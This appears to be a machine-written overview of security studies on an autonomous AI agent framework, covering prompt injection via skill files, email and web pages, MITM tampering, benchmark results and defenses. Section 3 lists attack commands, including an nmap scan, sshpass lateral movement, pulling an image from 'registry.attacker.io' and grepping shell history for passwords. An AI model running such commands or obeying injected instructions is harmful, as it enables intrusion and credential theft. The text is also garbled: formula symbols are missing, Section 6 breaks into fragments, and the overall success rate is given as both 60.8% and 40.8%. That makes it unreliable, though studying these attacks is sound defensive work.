KimiClaw Security Analysis
- KimiClaw Security Analysis is a comprehensive study of an autonomous agent framework that interacts directly with system resources, distinguishing it from chat-only LLM deployments.
- It employs quantitative benchmarks, including CLAWSAFETY and full lifecycle audits, to assess vulnerabilities such as prompt injection, harmful misoperation, and supply-chain risks.
- Defense strategies emphasize least privilege, runtime isolation, extension governance, and exhaustive logging to mitigate systemic risks and enhance overall security posture.
KimiClaw is an OpenClaw-derivative autonomous agent framework designed for high-privilege work automation across domains such as software engineering, finance, healthcare, law, and DevOps. Unlike chat-only LLM deployments, KimiClaw interacts directly with system resources, network interfaces, tools, and extensions, amplifying both its utility and its attack surface. Security analysis of KimiClaw centers on its exposure to adversarial input, deployment vulnerabilities, agent–model interactions, and the systemic risks introduced by persistent state and tool orchestration. Multiple independent studies and benchmarks—most notably CLAWSAFETY, ClawTrap, and comprehensive threat lifecycle audits—provide a rigorous, quantitative basis for KimiClaw security evaluation and hardening.
1. Threat Model and Vulnerability Taxonomy
The security posture of KimiClaw is best understood through a formal threat model that considers adversaries with the capability to manipulate inputs, extensions, deployment context, and runtime environment (Li et al., 13 Mar 2026). The risk taxonomy encompasses:
- Prompt Injection: Maliciously crafted input that hijacks policy enforcement or plan creation by exploiting the prompt–context composition.
- Harmful Misoperation: Induced execution of unintended or destructive actions due to ambiguous prompts or context drift.
- Extension Supply-Chain Risk: The risk that third-party skills or plugins are compromised, delivering privilege escalation or persistent logic bombs.
- Deployment Vulnerability: Weak authentication, permissive sandboxes, and absent network controls allowing the adversary to escalate, maintain, or exfiltrate.
These vulnerabilities are mapped to KimiClaw subsystems: parsers, plan managers, tool orchestrators, memory/workspace, extension loader, and API endpoints. The function defines the full system transition, where is the user, is the conversation context, is the mixed-trust input set, is the prompt sequence, is the tool/plugin set, is the extension set, and is the action set (Li et al., 13 Mar 2026).
2. Benchmark-Driven Security Evaluation
Systematic measurement of KimiClaw’s vulnerabilities leverages scenario-based, adversarial benchmarking as in CLAWSAFETY and full lifecycle audits (Wei et al., 1 Apr 2026, Wang et al., 3 Apr 2026). Attack scenarios are constructed along three orthogonal axes:
- Harm Domain: Compromise goals include credential theft, financial misrouting, regulatory data breach, legal information leakage, and destructive infrastructure actions.
- Attack Vector: Entry points are skill injections (malicious skill files within
~/.kimiclaw/skills/), email (injected via IMAP/SMTP hooks in the sandbox), and web (malicious pages fetched during agent operations). - Harmful Action Type: These include data exfiltration, credential forwarding, unlawful file modification, destructive OS actions, and destination/origin substitution.
Each test instance is embedded in a 64-turn, multi-phased workflow with ≥50 heterogeneous files and associated colleague identities, mimicking production-grade usage. For quantitative analysis, metrics such as per-vector attack success rate (ASR) and aggregate ASR are defined:
KimiClaw, evaluated as Kimi K2.5 on OpenClaw scaffold, achieves ASRs of 77.5% (skill), 60.0% (email), 45.0% (web), and 60.8% overall. These results establish a trust gradient of skill > email > web, and a hierarchy where KimiClaw is less robust than Sonnet 4.6, but more so than GPT-5.1 (Wei et al., 1 Apr 2026).
3. Empirical Vulnerabilities and Exploit Patterns
Multi-stage, category-based audits provide fine-grained insights into KimiClaw’s empirical weaknesses (Wang et al., 3 Apr 2026). Of the 205 tested cases across 13 threat categories, KimiClaw exhibits high success rates for the following critical classes:
| Category | Success Rate (%) | Example Attack |
|---|---|---|
| Reconnaissance | 100.0 | ifconfig && netstat -antp for network enumeration |
| Discovery | 68.97 | nmap -sS 192.168.0.0/24; process/service discovery |
| Lateral Movement | 66.67 | sshpass -p … ssh user@host for host traversal |
| Resource Development | 57.14 | docker pull registry.attacker.io/evil:latest |
| Privilege Escalation | 30.0 | sudo -l; SUID enumeration and privilege drift |
| Credential Access | 14.29 | grep -i password ~/.bash_history and private key exfiltration |
Additional chain-stage breakdown reveals amplification of early-stage vulnerabilities into concrete system-level failures at later phases.
4. MITM Red-Teaming and Dynamic Security Probing
Modern agent security analysis extends beyond static adversarial inputs to include live network-level attacks, as exemplified by the ClawTrap framework (Zhao et al., 19 Mar 2026). KimiClaw-specific security assessment employs MITM-based probes, supporting:
- Static HTML Replacement: Entire body swapped for attacker-controlled content, measured by content replacement metric .
- Iframe Injection: Append high-0-index overlays to legitimate pages (phishing, session hijack) quantified by 1 (overlay area fraction).
- Dynamic Content Modification: Fine-grained tampering of DOM/JSON fragments, assessed by 2.
Evaluation proceeds by recording model trust scores and fallback rates, with strong models triggering higher fallback rates (e.g., 70% for GPT-5.4 analogs) compared to less robust models (<5% fallback) under identical MITM stress.
MITM defenses for KimiClaw include enforcing HTTPS with certificate pinning, strict content hash verification, explicit “trust verification” agent skills, UI anomaly detectors, and centralized anomaly logging.
5. Design Principles and Secure Engineering Controls
Four foundational principles, as articulated in the defensible design blueprint, govern robust KimiClaw deployments (Li et al., 13 Mar 2026):
- Least Privilege: Capabilities 3 for task 4, enforced via tool-access policies where 5 deny.
- Runtime Isolation: Partitioning execution environments (sandboxes 6) with disjoint filesystem roots and environment variables; cross-sandbox visibility is formally forbidden.
- Extension Governance: Skills/extensions must provide signed manifests; installation proceeds only upon signature and hash verification—reject if failed.
- Auditability/Defense in Depth: All actions and decisions logged in tamper-evident, append-only ledgers, supporting post-hoc investigation and continuous monitoring.
Design patterns include explicit access-control checks per tool, sandbox-boundary enforcement, manifest verification during extension installation, and per-action audit logs with cryptographic hash chaining.
6. Defense Recommendations and Evaluation Metrics
Mitigation strategies span the full lifecycle:
- Input-Side Inspection: Normalize and rescan all inputs for suspicious opcodes, keywords, or encoded commands prior to prompt assembly.
- Safer Planning: Mark any plan involving
sudo,U$799% (fraction of adversarial inputs failing to alter plan) - Harmful-misoperation rate $U$80.5%
- Extension-compromise detection (time-to-detect $U$960s)
- Unauthorized action prevention: policy-consistent action logging and denial
7. Comparative Assessment and Ongoing Risks
KimiClaw’s overall attack success rate (40.8%) positions it as more resilient than QClaw (54.9%) and AutoClaw (49.5%), but significantly less robust than MaxClaw (16.0%) and OpenClaw (19.4%). Its profile is characterized by unique susceptibility to lateral movement and resource development, weaknesses not found in pure OpenClaw deployments. Cross-scaffold and backbone analyses confirm that security outcomes are determined by the confluence of agent runtime, model safety properties, scaffold memory policies, and tool orchestration.
Periodic re-evaluation with updated adversarial scenarios and lifecycle-wide monitoring remains essential to maintain and improve KimiClaw’s security guarantees. Full-stack, policy-mediated permission management, extension governance, runtime isolation, and continuous audit form the core of defensible, testable KimiClaw deployments (Wei et al., 1 Apr 2026, Zhao et al., 19 Mar 2026, Li et al., 13 Mar 2026, Wang et al., 3 Apr 2026).